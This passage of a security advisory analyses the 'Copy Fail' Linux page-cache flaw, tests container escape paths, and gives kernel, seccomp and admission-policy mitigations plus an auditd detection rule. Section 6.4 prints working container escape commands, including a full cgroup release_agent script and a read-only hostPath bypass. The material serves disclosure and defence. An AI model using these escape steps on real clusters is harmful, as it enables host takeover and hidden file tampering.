The answer is the latter. Page Cache is a global transparent cache for file I/O. Both read() and execve() load file content through the page cache, for example through filemap_read and readahead. If the page for an inode already exists in page cache, the kernel returns the cached data and does not reread disk. This behavior is independent of the namespace of the process accessing the file.
The experiment in Section 6.1 provides direct evidence. After tampering with /etc/os-release from inside a container:
# The host reads the same inode through the snapshot path and sees the tampered data.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# drop_caches forces eviction and the kernel reloads from disk.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
The before-and-after comparison shows that the host read page-cache content rather than disk content. The same applies to execve(). In the hostPath experiment in Section 6.4, after a container tampers with the page cache of /usr/bin/ls, the host's execution of ls returns exit 126 with exec format error. That proves execve() loaded the tampered ELF header from page cache.
Therefore, page-cache tampering is globally visible to the host and affects both read() and execve(). The real question is whether, in the standard container lifecycle, host processes actively access file inodes from container snapshot layers. There are two candidate scenarios:
- Whether the container runtime, such as containerd and runc, executes or dlopen()s files from a container snapshot layer in the host context during container creation or startup.
- Whether other host tools, such as EDR or compliance scanners, execute binaries, load .so files, or interpret scripts from container layers.
For scenario 1, bpftrace was used to trace runc and containerd during container startup:
# Trace the mount namespace used by runc init when it reads files.
bpftrace -e '
kprobe:vfs_read /comm == "runc:[2:INIT]"/ {
$task = (struct task_struct *)curtask;
$mntns = $task->nsproxy->mnt_ns->ns.inum;
printf("runc-init vfs_read mntns=%u file=%s\n",
$mntns, str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' &
# Trigger container creation.
kubectl run test-probe --image=python:3.11-slim --restart=Never -- sleep 10
# Output:
# runc-init vfs_read mntns=4026533841 file=passwd
# runc-init vfs_read mntns=4026533841 file=group
# mntns is not the host namespace (4026531840), so runc is already inside the container namespace.
# Trace vfs_read in the containerd process.
bpftrace -e '
kprobe:vfs_read /comm == "containerd"/ {
printf("containerd vfs_read: %s\n",
str(((struct file *)arg0)->f_path.dentry->d_name.name));
}
interval:s:60 { exit(); }' # stop after 60 seconds; create and delete containers meanwhile
# Result: only config.json, meta.db, and similar metadata files appear.
# It never reads /bin/*, /etc/*, or other user files from snapshot layers.
The containerd trace confirms the same conclusion: it operates on metadata such as config.json and meta.db, and does not read or execute user files from snapshot layers.
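The namespace comparison in the runc trace can be repeated from user space by reading the /proc/<pid>/ns/mnt symlink, whose target has the form mnt:[inode]. The sketch below uses hypothetical helper names, and reading another process's namespace link generally requires sufficient privilege on the host.

```python
import os
import re


def parse_ns_link(link):
    """Split a namespace link such as 'mnt:[4026531840]' into (type, inode)."""
    m = re.fullmatch(r"(\w+):\[(\d+)\]", link)
    if not m:
        raise ValueError(f"unexpected namespace link: {link!r}")
    return m.group(1), int(m.group(2))


def mnt_ns_inum(pid="self"):
    """Return the mount-namespace inode number of a process."""
    return parse_ns_link(os.readlink(f"/proc/{pid}/ns/mnt"))[1]


def in_same_mnt_ns(pid_a, pid_b="self"):
    """True if both processes are in the same mount namespace."""
    return mnt_ns_inum(pid_a) == mnt_ns_inum(pid_b)


print(parse_ns_link("mnt:[4026533841]"))  # ('mnt', 4026533841)
```

Comparing a process against PID 1 with in_same_mnt_ns(pid, 1) avoids hard-coding the host namespace number.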
Scenario 2 is environment-specific. Whether a host-side tool executes or loads files from container-layer paths depends on the software deployed on that node. It is not a universal condition and is not tested as a general escape path here, though such behavior could exist in specific environments.
Conclusion: in a standard Kubernetes environment using containerd, a generic zero-privilege container-to-host direct escape is architecturally infeasible. The runtime design ensures that runc's operations on the container rootfs occur after switching to the container mount namespace, while containerd does not touch user data inside snapshot layers. If a non-standard host service loads and executes files from container-layer paths, that can create an environment-specific escape vector. Docker has architectural differences and is discussed separately in Section 6.5.
6.4 Privileged Configurations and Container Escape
A zero-privilege direct escape is not practical, but if a container has certain privileged configurations, Copy Fail can become the missing final piece that turns read access into host-file tampering. The following cases were systematically verified.
hostPath readOnly plus Copy Fail: Bypassing Read-Only Restrictions
Kubernetes hostPath volumes are often configured with readOnly: true to prevent containers from modifying host files. Copy Fail bypasses that assumption through the page cache:
# Pod configuration. See pod-hostpath-escape.yaml in the experiment package.
volumes:
- name: host-bin
hostPath:
path: /usr/bin
type: Directory
volumeMounts:
- name: host-bin
mountPath: /hostbin
readOnly: true # looks safe
# Confirm the mount is read-only.
kubectl exec -n copyfail-lab hostpath-test -- mount | grep hostbin
# /dev/mapper/cl-root on /hostbin type xfs (ro,relatime,...)
# Normal write is denied.
kubectl exec -n copyfail-lab hostpath-test -- touch /hostbin/test
# touch: cannot touch '/hostbin/test': Read-only file system
# Copy Fail bypasses the read-only restriction.
kubectl exec -n copyfail-lab hostpath-test -- python3 /poc_marker.py /hostbin/ls
# [*] Before: 7f454c46
# [*] After: deadbeef
# [+] SUCCESS: page cache corrupted!
# Host verification.
ls
# bash: /usr/bin/ls: cannot execute binary file: Exec format error
# Exit code: 126
This is the most distinctive value of Copy Fail: it turns an O_RDONLY file descriptor into a writable attack surface. The common assumption is that a read-only mount at least prevents file tampering. Copy Fail breaks that assumption.
CAP_DAC_READ_SEARCH plus Copy Fail: Upgraded Shocker
CAP_DAC_READ_SEARCH allows a process to bypass file and directory read-permission checks. The classic Shocker attack uses open_by_handle_at() with this capability to obtain file descriptors for the host filesystem. Original Shocker only allowed reading host files.
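With Copy Fail, the read-only descriptor becomes a write primitive. The chain is: obtain a host-root file descriptor with open_by_handle_at(), open the target file read-only, then overwrite its page cache: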
# Deploy a container with CAP_DAC_READ_SEARCH.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: shocker-test
namespace: copyfail-lab
spec:
containers:
- name: test
image: python:3.11-slim
command: ["sleep", "infinity"]
securityContext:
capabilities:
add: ["DAC_READ_SEARCH"]
EOF
Attack process, executed inside the container:
kubectl exec -n copyfail-lab shocker-test -- python3 -c "
import os, struct, ctypes
# 1. Shocker: use open_by_handle_at() to obtain a host-root fd.
libc = ctypes.CDLL('libc.so.6', use_errno=True)
# ... construct root inode handle and call open_by_handle_at
# 2. Use openat() to open host /usr/bin/cat. Read-only is enough.
# 3. Use Copy Fail to tamper with the page cache.
"
# Experiment output:
# [1] Host root fd: 4
# [+] Host / contents: ['.autorelabel', 'bin', 'boot', 'dev', 'etc', ...]
# [2] Host /usr/bin/cat fd: 7
# [3] Before: 7f454c46020101000000000000000000
# [4] After: deadbeef020101000000000000000000
# [+] SUCCESS: Host /usr/bin/cat corrupted via Shocker + Copy Fail!
CAP_SYS_ADMIN plus Copy Fail: cgroup release_agent Escape
# Deploy a container with CAP_SYS_ADMIN.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: sysadmin-test
namespace: copyfail-lab
spec:
containers:
- name: test
image: python:3.11-slim
command: ["sleep", "infinity"]
securityContext:
capabilities:
add: ["SYS_ADMIN"]
EOF
Use cgroup v1 release_agent inside the container:
kubectl exec -n copyfail-lab sysadmin-test -- bash -c '
# Mount a cgroup subsystem.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
# Confirm release_agent is writable.
echo 1 > /tmp/cgrp/x/notify_on_release
# Set release_agent to a script path in the container upperdir.
host_path=$(sed -n "s/.*upperdir=\([^,]*\).*/\1/p" /proc/self/mountinfo)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Write the escape command.
echo "#!/bin/sh" > /cmd
echo "id > /tmp/cgrp/output; hostname >> /tmp/cgrp/output" >> /cmd
chmod +x /cmd
# Trigger.
echo $$ > /tmp/cgrp/x/cgroup.procs
sleep 1 && echo 0 > /tmp/cgrp/x/cgroup.procs
sleep 1 && cat /tmp/cgrp/output
'
# uid=0(root) gid=0(root) groups=0(root)
# your-hostname
# The host executed the command as root.
hostPID plus CAP_SYS_PTRACE plus Copy Fail
When a container shares the host PID namespace and has CAP_SYS_PTRACE, it can access the host filesystem root through /proc/1/root/. Combined with Copy Fail's page-cache write, this can tamper with host files.
# Obtain a host-file fd through /proc/1/root/ and use Copy Fail to tamper with it.
kubectl exec -n copyfail-lab hostpid-test -- python3 -c "
import os
fd = os.open('/proc/1/root/usr/bin/cat', os.O_RDONLY)
# ... page_cache_write_4bytes(fd, 0, b'\xde\xad\xbe\xef')
"
Summary
| Privileged configuration | Escape by itself | With Copy Fail |
|---|---|---|
| hostPath readOnly | No, read-only | Yes, bypass read-only and tamper with host files |
| CAP_DAC_READ_SEARCH | No, read-only | Yes, Shocker read becomes read/write |
| CAP_SYS_ADMIN | Yes, known path | Yes, cgroup release_agent |
| hostPID plus SYS_PTRACE | Yes, known path | Yes, tamper through /proc/1/root/ |
| hostPID alone | No | No |
| SYS_PTRACE alone | No | No |
| NET_ADMIN, hostNetwork, hostIPC | No | No |
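The table can be turned into a rough audit of Pod manifests. The sketch below takes a manifest that is already parsed into a dict, for example with json.loads on the output of kubectl get pod -o json, and reports the rows that apply. The function names and finding strings are hypothetical, and only the configurations tested above are covered.

```python
def _caps(container):
    """Upper-case added capabilities with any CAP_ prefix removed."""
    sc = container.get("securityContext") or {}
    added = (sc.get("capabilities") or {}).get("add") or []
    return {c.upper()[4:] if c.upper().startswith("CAP_") else c.upper()
            for c in added}


def risky_settings(pod):
    """Return the table rows that apply to a Pod manifest given as a dict."""
    spec = pod.get("spec") or {}
    findings = []
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            findings.append("hostPath volume: readOnly does not protect the page cache")
    for c in spec.get("containers") or []:
        caps = _caps(c)
        if "DAC_READ_SEARCH" in caps:
            findings.append("CAP_DAC_READ_SEARCH: Shocker read becomes read/write")
        if "SYS_ADMIN" in caps:
            findings.append("CAP_SYS_ADMIN: known escape path")
        if spec.get("hostPID") and "SYS_PTRACE" in caps:
            findings.append("hostPID plus SYS_PTRACE: /proc/1/root/ reachable")
    return findings


shocker_pod = {"spec": {"containers": [
    {"name": "test",
     "securityContext": {"capabilities": {"add": ["DAC_READ_SEARCH"]}}}]}}
print(risky_settings(shocker_pod))
```

A Pod that sets only hostPID, or only SYS_PTRACE, produces no finding, which matches the last rows of the table.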
6.5 Docker Environment
The previous analysis focused on Kubernetes with containerd. Docker shares the same underlying mechanisms: overlayfs layer sharing and global page-cache behavior. Therefore, cross-container page-cache sharing, read-only volume bypass with -v path:ro, and Shocker upgrade with --cap-add DAC_READ_SEARCH also work in Docker. I verified this on Docker 26.1.3 with overlay2 on XFS. The reproduction is essentially the same: replace kubectl exec with docker exec, and replace readOnly: true with -v path:ro.
This section focuses on Docker-specific architectural differences.
dockerd Architectural Difference
Section 6.3 showed that containerd in a Kubernetes environment only traverses metadata and does not read file data from snapshot layers. Docker's dockerd is different. As a monolithic daemon, management APIs such as docker export, docker commit, and docker cp read full file content from the container overlay filesystem with host privileges. If the page cache is already tampered with, these operations read the tampered bytes.
This behavior is not unique to Copy Fail. If a container directly writes a file, docker commit or docker export will also include the change. The unique value of Copy Fail appears in the next section: stealth.
docker export versus docker commit: Persistence Difference
The two operations treat Copy Fail tampering very differently.
docker export: persistent. It flattens the entire container filesystem into a tar archive and reads file contents one by one. Tampered page-cache bytes written into the tar become permanent and no longer depend on the page-cache lifecycle:
docker run -d --name copyfail-test python:3.11-slim sleep infinity
docker cp poc_marker.py copyfail-test:/poc_marker.py
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# Export while page cache is tampered; the tar records the tampered data.
docker export copyfail-test > tainted.tar
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# Export again after drop_caches; the new tar has original data.
echo 3 > /proc/sys/vm/drop_caches
docker export copyfail-test > clean.tar
tar xf clean.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
# Key point: the first tar remains permanently tainted even after page cache is cleared.
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
If this tar is used with docker import to build a new image or is distributed to another environment, the tampering becomes a supply-chain artifact.
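The manual xxd comparison above can also be scripted. The following is a minimal sketch, assuming two archives like the tainted.tar and clean.tar produced above and the member path usr/lib/os-release. The helper names member_head and compare_member are illustrative and are not part of Docker or the original PoC.

```python
import tarfile


def member_head(tar_path, member, length=16):
    """Return the first `length` bytes of `member` inside a tar archive."""
    with tarfile.open(tar_path, "r") as tar:
        extracted = tar.extractfile(member)  # raises KeyError if the member is missing
        if extracted is None:  # directories and special files carry no data
            raise ValueError(f"{member} is not a regular file in {tar_path}")
        with extracted:
            return extracted.read(length)


def compare_member(tar_a, tar_b, member, length=16):
    """Return the byte offsets, within the first `length` bytes, where the archives differ."""
    head_a = member_head(tar_a, member, length)
    head_b = member_head(tar_b, member, length)
    return [i for i, (x, y) in enumerate(zip(head_a, head_b)) if x != y]
```

Calling compare_member("tainted.tar", "clean.tar", "usr/lib/os-release") on archives like the ones above should report the four leading offsets if the marker PoC overwrote the first four bytes.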
docker commit: not persistent. It creates a new image layer but only records upper-layer changes. Lower layers are shared by reference; their file data is not copied into the new layer. Therefore, lower-layer files in the committed image are still read dynamically from page cache or disk:
# Tamper with page cache again.
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# Commit and start a container from the new image; it sees tampered data from page cache.
docker commit copyfail-test copyfail-committed:test
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562 ....TY_NAME="Deb
# After drop_caches, it sees original data reloaded from disk.
echo 3 > /proc/sys/vm/drop_caches
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562 PRETTY_NAME="Deb
Stealth: Blind Spots in Layered Detection
The previous section showed that docker export can persist tampered data, but directly writing a file inside the container and exporting it can do the same. Copy Fail's unique value is that tampering happens in the page cache of the lower layer and does not trigger overlayfs Copy-on-Write, so Docker's layered detection mechanisms fail.
1. Invisible to docker diff
docker diff copyfail-test
# A /poc_marker.py <- only upper-layer additions
# C /usr/local/lib/... <- Python cache files
# /usr/lib/os-release does not appear
docker diff only checks upper-layer changes. A direct file write triggers CoW into the upper layer and is immediately visible. Copy Fail modifies page cache only, so docker diff sees nothing.
2. The overlay2 layer path is also "polluted"
LAYER=$(docker inspect copyfail-test --format '{{.GraphDriver.Data.LowerDir}}' \
| tr ':' '\n' | xargs -I{} sh -c 'test -f {}/usr/lib/os-release && echo {}' | head -1)
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# deadbeef54595f4e414d453d22446562 <- host read of layer path returns page-cache data
echo 3 > /proc/sys/vm/drop_caches
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# 5052455454595f4e414d453d22446562 <- original data appears only after drop_caches
The layer-path file and the file inside the container share the same inode, and both go through the page cache. Any host-side tool that reads through the kernel filesystem path, such as sha256sum, cat, or a file-integrity scanner, reads the tampered data while the page cache is poisoned. It cannot distinguish real disk content from tampered page-cache content.
3. Image layer digest is unchanged
The compressed image-layer blobs listed in docker image inspect under RootFS.Layers are unaffected. They are independent tar.gz files and are different inodes from the files extracted under overlay2. Image scanners such as Trivy or Snyk usually analyze these layer blobs, so scanning the original image does not detect Copy Fail tampering.
Comparison
| Dimension | Copy Fail tampering | Direct file modification |
|---|---|---|
| Visible to docker diff | No, lower-layer page cache only | Yes, upper-layer CoW |
| Persisted by docker export | Yes, tampered bytes are written to tar | Yes |
| Persisted by docker commit | No, only valid while page cache is poisoned | Yes, written to upper layer |
| Image layer digest | Unchanged | New layer has a new digest |
| Image scanning of layer blobs | Not detected | Detectable if the changed layer is scanned |
| Page-cache lifecycle | Volatile; cleared by reboot or drop_caches | Not applicable; written to disk |
The value of Copy Fail in this scenario is not that it can do something direct writes cannot do. Its value is what it can do without being noticed: no docker diff entry, unchanged layer digest, no image-scanner finding, while docker export can still persist and distribute the tampered bytes.
7. Mitigation
The fundamental fix for Copy Fail is to upgrade the kernel (Section 7.1). If immediate upgrade is not possible, disable the vulnerable module as a temporary mitigation (Section 7.2). For container environments, additionally deploy a seccomp policy that blocks AF_ALG socket creation (Section 7.3).
Older Docker default seccomp profiles, Kubernetes RuntimeDefault, SELinux targeted policy, and sysctl settings do not mitigate this vulnerability. SELinux can block AF_ALG system-wide through a custom policy module that denies the alg_socket class, and that works for bare metal, VMs, and containers. However, it requires rules for each SELinux domain and is more complex to deploy and maintain than seccomp or module disabling.
7.1 Fundamental Fix: Upgrade the Kernel
The only complete fix is to upgrade to a kernel that includes patch a664bf3d603d. As of May 2026, the status of major distributions is summarized below:
| Distribution | Status | Fix or mitigation | Reference label |
|---|---|---|---|
| Ubuntu 18.04-25.10 | Mitigation released | kmod update disables algif_aead; kernel patch pending | Ubuntu Blog |
| Ubuntu 26.04 (Resolute) | Not affected | Already includes the fix | Ubuntu Blog |
| RHEL 9 | Kernel fix released | RHSA-2026:13565, 2026-05-04 | RHSB-2026-02 |
| RHEL 10 | Kernel fix released | RHSA-2026:13566, 2026-05-04 | RHSB-2026-02 |
| RHEL 8 | Kernel fix released | RHSA-2026:13681 for 8.8, 2026-05-05; RHSA-2026:14230 for 8.6, 2026-05-06 | RHSB-2026-02 |
| Fedora 43 | Fixed | kernel 6.19.12 | Fedora Discussion |
| Debian 11/12/13 | Kernel fix released | DSA-6238-1, DSA-6243-1 | Debian Tracker |
| Alpine Linux | Fixed | Docker 29.4.2-r0 in edge; kernel packages fixed | Alpine Security |
| Oracle Linux 7/8/9/10 | Kernel fix released | ELSA-2026-50253/50254/50255, including UEK | Oracle CVE |
| AlmaLinux / Rocky | Kernel fix released | ALSA-2026:A001 for 8, ALSA-2026:A002 for 9 | AlmaLinux Blog |
| CentOS 8 Stream | Live patch available | KernelCare live patch | CloudLinux |
| SUSE / openSUSE | Patch released | SUSE-SU-2026:1671, 2026-05-02 | SUSE Response |
| Amazon Linux 2023 | Patch released | Kernel security update | AWS Bulletin |
| Bottlerocket | Patch released | OS update | Bottlerocket issue #4821 |
| Arch Linux | Fixed | Rolling update, kernel >= 6.19.12 | Arch Security |
Affected kernel version ranges
The affected ranges reported by the Alpine Security Tracker are:
- 4.14 <= kernel < 5.10.254
- 5.11 <= kernel < 5.15.204
- 5.16 <= kernel < 6.1.170
- 6.2 <= kernel < 6.6.137
- 6.7 <= kernel < 6.12.85
- 6.13 <= kernel < 6.18.22
- 6.19 <= kernel < 6.19.12
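The range list can be turned into a first-pass check. This is a minimal sketch that assumes the ranges above are complete and that the release string starts with an upstream-style major.minor[.patch] version; the names AFFECTED_RANGES, parse_release, and in_affected_range are illustrative. Distribution kernels often backport fixes without changing the upstream version number, so a positive result only means the vendor advisory should be checked, not that the host is vulnerable.

```python
import re

# (first affected version, first fixed version) for each range listed above.
AFFECTED_RANGES = [
    ((4, 14, 0), (5, 10, 254)),
    ((5, 11, 0), (5, 15, 204)),
    ((5, 16, 0), (6, 1, 170)),
    ((6, 2, 0), (6, 6, 137)),
    ((6, 7, 0), (6, 12, 85)),
    ((6, 13, 0), (6, 18, 22)),
    ((6, 19, 0), (6, 19, 12)),
]


def parse_release(release):
    """Extract (major, minor, patch) from a `uname -r` style string."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return tuple(int(group) if group else 0 for group in match.groups())


def in_affected_range(release):
    """True if the upstream version falls inside one of the listed ranges."""
    version = parse_release(release)
    return any(low <= version < high for low, high in AFFECTED_RANGES)
```

A typical call is in_affected_range(platform.release()) after importing platform. A patched RHEL 9 kernel still reports 5.14.0 and would be flagged by this check, which is why the result must be confirmed against the advisory table above.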
Check whether the current system is affected:
# 1. Check whether the kernel version is in an affected range.
uname -r
# 2. Check whether algif_aead is loadable or built in.
# Output means loadable module; no output usually means built-in or absent.
modinfo algif_aead 2>/dev/null && echo "==> LOADABLE module" || echo "==> BUILT-IN or not present"
# 3. Check whether mitigations are already present.
# Debian/Ubuntu: kmod mitigation.
grep -r algif_aead /etc/modprobe.d/ 2>/dev/null
# RHEL/CentOS: initcall_blacklist.
cat /proc/cmdline | grep -o 'initcall_blacklist=[^ ]*'
Distribution update commands:
# Debian/Ubuntu:
sudo apt update && sudo apt upgrade
# Alpine:
apk update && apk upgrade
# Arch:
pacman -Syu
# SUSE:
zypper update
# RHEL/CentOS:
sudo dnf update kernel && sudo reboot
# Fedora:
sudo dnf upgrade --refresh && sudo reboot
CISA KEV
The vulnerability was added to the CISA Known Exploited Vulnerabilities catalog on 2026-05-01, with remediation due on 2026-05-15.
7.2 Temporary Mitigation: Disable the Vulnerable Module
If the kernel cannot be upgraded immediately, disable algif_aead as a temporary mitigation. The correct method depends on whether the distribution builds it as a loadable module or built-in code:
| Build type | Representative distributions | How to identify | Mitigation |
|---|---|---|---|
| Loadable module (=m) | Ubuntu, Debian, Alpine, Arch, SUSE | modinfo algif_aead returns output | modprobe blacklist or rmmod |
| Built-in (=y) | RHEL, CentOS, Oracle Linux, Fedora, Amazon Linux | modinfo algif_aead fails | initcall_blacklist kernel parameter |
Distributions with a loadable module (Ubuntu, Debian, Alpine, Arch, and SUSE):
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif_aead.conf
sudo rmmod algif_aead 2>/dev/null || sudo reboot
Ubuntu's kmod security update creates this file automatically.
Distributions with built-in code: RHEL, CentOS, Oracle Linux, Fedora, and Amazon Linux.
For built-in code, rmmod and /etc/modprobe.d/ blacklist files are ineffective:
grep CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
# CONFIG_CRYPTO_USER_API_AEAD=y <- built in, not a module
rmmod algif_aead 2>&1
# rmmod: ERROR: Module algif_aead is builtin.
Use the initcall_blacklist kernel boot parameter:
# Disable algif_aead initialization.
grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
reboot
# More aggressive: disable the whole AF_ALG interface.
grubby --update-kernel=ALL --args="initcall_blacklist=af_alg_init"
reboot
Validate mitigation on all distributions:
python3 -c "import socket; socket.socket(38,5,0)" 2>&1
# Expected: OSError: [Errno 97] Address family not supported by protocol
# or: OSError: [Errno 93] Protocol not supported
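The one-liner above only tests whether an AF_ALG socket can be created. In the kernel's AF_ALG design the algorithm type is resolved at bind() time, so when only algif_aead is disabled and af_alg itself remains available, socket creation may still succeed. The sketch below therefore also attempts to bind to the aead type. It makes two assumptions: the algorithm name gcm(aes) is only an example, and a missing algorithm also fails at bind(), so choose a name known to exist on the host. The function name check_aead and the make_socket parameter are illustrative.

```python
import errno
import socket

AF_ALG = getattr(socket, "AF_ALG", 38)  # 38 is the value used in the one-liner above


def check_aead(make_socket=socket.socket, alg_name="gcm(aes)"):
    """Report at which step, if any, access to an AEAD socket is refused."""
    try:
        sock = make_socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError as exc:
        # The address family itself is unavailable or filtered (af_alg disabled, seccomp, LSM).
        return "blocked at socket(): " + errno.errorcode.get(exc.errno, str(exc.errno))
    try:
        sock.bind(("aead", alg_name))
    except OSError as exc:
        # The aead type (or the chosen algorithm) could not be resolved.
        return "blocked at bind(): " + errno.errorcode.get(exc.errno, str(exc.errno))
    finally:
        sock.close()
    return "NOT mitigated: aead bind succeeded"
```

Running print(check_aead()) as an unprivileged user gives a quick indication of which layer, if any, is refusing access. The make_socket parameter exists only so the logic can be exercised without a real AF_ALG socket.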
Notes
- These mitigations may affect applications that use kernel-accelerated crypto, such as OpenSSL's afalg engine or IPsec xfrm. Most applications fall back to user-space crypto automatically, so practical impact is usually small.
- KernelCare users can apply the live patch with kcarectl --update without reboot. Verify with kcarectl --patch-info | grep -i "copy.fail\|algif_aead\|CVE-2026-31431".
7.3 Container Mitigation
If the host kernel has been upgraded to a fixed version (Section 7.1) or the vulnerable module has been disabled (Section 7.2), the vulnerability is eliminated at the root. The container-layer controls below are not strictly required in that case. As defense in depth, however, it is still recommended to block AF_ALG socket creation in containers. The interface has very few legitimate container use cases, and blocking it reduces the attack surface for future bugs in the kernel crypto subsystem as well.
Default security mechanisms do not block it
Older Docker versions before 29.4.2, Kubernetes RuntimeDefault, and the SELinux targeted policy all allow socket(AF_ALG) and splice(). They do not prevent exploitation.
Upgrade the Docker Runtime
Docker 29.4.2 and later updated the default container policy to block AF_ALG socket creation. For Docker users, upgrading is the simplest defense and requires no extra configuration:
docker --version
# Docker version 29.4.3 or later means the defense is built in.
# Validate.
docker run --rm python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL - AF_ALG not blocked')
except OSError as e:
    print(f'[+] AF_ALG blocked: {e}')"
Docker 29.4.2 regression
Docker 29.4.2 tried to block AF_ALG by denying socketcall(2) through seccomp, but that broke 32-bit programs and i386 images such as SteamCMD and Wine. Docker 29.4.3, released on 2026-05-06, fixed the regression by moving enforcement to Docker's own AppArmor/SELinux container profile at the LSM layer. This does not break 32-bit programs. Upgrade directly to 29.4.3 or later.
The SELinux rule here is a Docker-provided deny rule for alg_socket in the container profile. It is not the same as the system default SELinux targeted policy, which does not restrict AF_ALG and does not mitigate this issue by itself. On RHEL/CentOS systems, Docker needs "selinux-enabled": true in daemon.json for the SELinux rule to apply. If SELinux is not enabled, Docker falls back to AppArmor rules on distributions such as Ubuntu and Debian.
Kubernetes is not protected by Docker upgrades
Kubernetes RuntimeDefault seccomp profiles come from the node's CRI runtime, such as containerd or CRI-O, and are independent of Docker Engine. Upgrading Docker does not change seccomp behavior for Kubernetes containers. Use a custom profile as described below.
Deploying a Custom Seccomp Profile
For Kubernetes clusters or Docker environments that cannot be upgraded, deploy a custom seccomp profile manually. The profile only blocks AF_ALG socket creation where family=38; it does not affect normal TCP/UDP networking. AF_ALG has almost no legitimate use inside most containerized applications.
Custom profile block-af-alg.json:
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 1,
      "args": [
        { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
      ]
    }
  ]
}
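To make the matching logic of this profile concrete, here is a toy evaluator. It is a simplified model written for illustration, not how the runtime or the kernel's BPF filter is implemented: it supports only the SCMP_CMP_EQ operator used above, and the names PROFILE, evaluate, and _arg_matches are hypothetical.

```python
import json

PROFILE = json.loads("""
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 1,
      "args": [ { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" } ]
    }
  ]
}
""")


def _arg_matches(cond, args):
    """Evaluate one argument condition; only equality is modelled here."""
    if cond["op"] != "SCMP_CMP_EQ":
        raise NotImplementedError(cond["op"])
    return args[cond["index"]] == cond["value"]


def evaluate(profile, syscall, args):
    """Return (action, errno) for a syscall under this simplified model."""
    for rule in profile.get("syscalls", []):
        if syscall not in rule["names"]:
            continue
        if all(_arg_matches(cond, args) for cond in rule.get("args", [])):
            return rule["action"], rule.get("errnoRet")
    return profile["defaultAction"], None
```

Under this model, evaluate(PROFILE, "socket", (38, 5, 0)) yields the ERRNO action with errno 1 (EPERM), while an AF_INET socket falls through to the default allow action. The model also shows that a call routed through socketcall(2), as 32-bit programs may do, is not matched by a rule on socket, which is the gap that the Docker 29.4.2 change tried to close.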
Cross-distribution applicability
Seccomp-BPF filtering has been part of the Linux kernel since 3.5, and the dedicated seccomp(2) syscall has been available since 3.17. The profile above applies to any Linux distribution as long as the kernel is at least 3.17 and the container runtime supports seccomp. Docker 1.10 and later, containerd, CRI-O, and Podman all support it.
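For non-container environments, such as bare metal or VMs, load an equivalent filter with libseccomp at application startup, or use systemd's RestrictAddressFamilies= directive for services. systemd's SystemCallFilter= directive filters by syscall name only and cannot match the address-family argument.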
Manual Docker deployment:
docker run --rm --security-opt seccomp=block-af-alg.json \
  python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL')
except PermissionError as e:
    print(f'[+] AF_ALG blocked: {e}')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('[+] TCP socket OK')
s.close()"
# [+] AF_ALG blocked: [Errno 1] Operation not permitted
# [+] TCP socket OK
Kubernetes deployment:
Pod Security Standards, including Privileged, Baseline, and Restricted, do not restrict AF_ALG. Deploy the custom profile manually:
cp block-af-alg.json /var/lib/kubelet/seccomp/
# k3s path: /var/lib/rancher/k3s/agent/seccomp/
Reference it from the Pod configuration:
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: block-af-alg.json
Use an admission controller such as Kyverno or OPA/Gatekeeper to enforce the profile for all Pods and avoid omissions:
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-seccomp-block-af-alg
spec:
  validationFailureAction: Enforce
  rules:
    - name: check-seccomp
      match:
        any:
          - resources:
              kinds: ["Pod"]
      validate:
        message: "Pod must use block-af-alg seccomp profile (CVE-2026-31431 mitigation)"
        pattern:
          spec:
            securityContext:
              seccompProfile:
                type: "Localhost"
                localhostProfile: "block-af-alg.json"
8. Attack Detection
8.1 Syscall-Level Auditing and Its Limits
The most direct detection idea is to monitor key syscalls in the exploit chain. Auditd can record AF_ALG socket creation:
# Persistent audit rules.
cat > /etc/audit/rules.d/copyfail.rules <<'EOF'
-a always,exit -F arch=b64 -S socket -F a0=38 -k copyfail_af_alg
